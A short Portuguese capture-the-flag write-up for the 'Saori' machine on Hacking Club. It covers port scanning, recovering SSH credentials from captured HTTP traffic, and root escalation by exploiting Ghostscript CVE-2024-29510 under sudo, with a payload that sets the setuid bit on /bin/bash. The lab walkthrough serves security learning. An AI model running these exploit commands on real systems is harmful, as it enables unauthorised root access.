Published on

Saori Writeup

Authors
Saori 1

Plataforma: Hacking Club

Dificuldade: Easy

Nome: Saori


Port Scanning

nmap -sV -sC -p- -v $IP --open

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.6p1 Ubuntu 3ubuntu13.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 da:cf:66:16:98:0d:7c:69:17:3a:09:dc:a1:c1:1e:cd (ECDSA)
|_  256 0c:31:6e:b6:4a:88:39:35:72:02:1b:6b:fa:df:44:91 (ED25519)
80/tcp open  http    Apache httpd 2.4.58
| http-methods:
|_  Supported Methods: GET POST OPTIONS HEAD
|_http-title: Blog
|_http-server-header: Apache/2.4.58 (Ubuntu)
Service Info: Host: ip-172-16-4-216.ec2.internal; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Somente as portas 22 (SSH) e 80 (HTTP) estão abertas.

Enumeration

sudo vim /etc/hosts Saori 2
Saori 3

Depois de baixar o client, a gente executa ele e captura o trafego com o wireshark.

chmod +x client ./client

Quando executamos ele baixa um arquivo chamado game.sfc Saori 4
Interceptei o download do game.sfc com wireshark: Saori 5
Saori 6 Achamos as credenciais do user abner no campo authorization do HTTP capturado pelo wireshark. Credentials: abner:m0V55O1qm78MyEluU

Foot Hold

ssh abner@172.16.4.216 Saori 7

Privillege Escalation

sudo -l Saori 8
Essa versão do gs tem uma CVE: gs --version Saori 9

https://codeanlabs.com/blog/research/cve-2024-29510-ghostscript-format-string-exploitation/ A CVE original executa a calculadora do gnome , basta alterar pro comando que a gente quiser.

% And now `path_control_active` == 0, so we can use %pipe%

(%pipe%chmod u+s /bin/bash) (r) file

quit
sudo /usr/local/bin/gs -q -dNODISPLAY -dBATCH -dSAFER /root/../tmp/exploit.eps Saori 10
bash -p Saori 11

Proof

Saori 12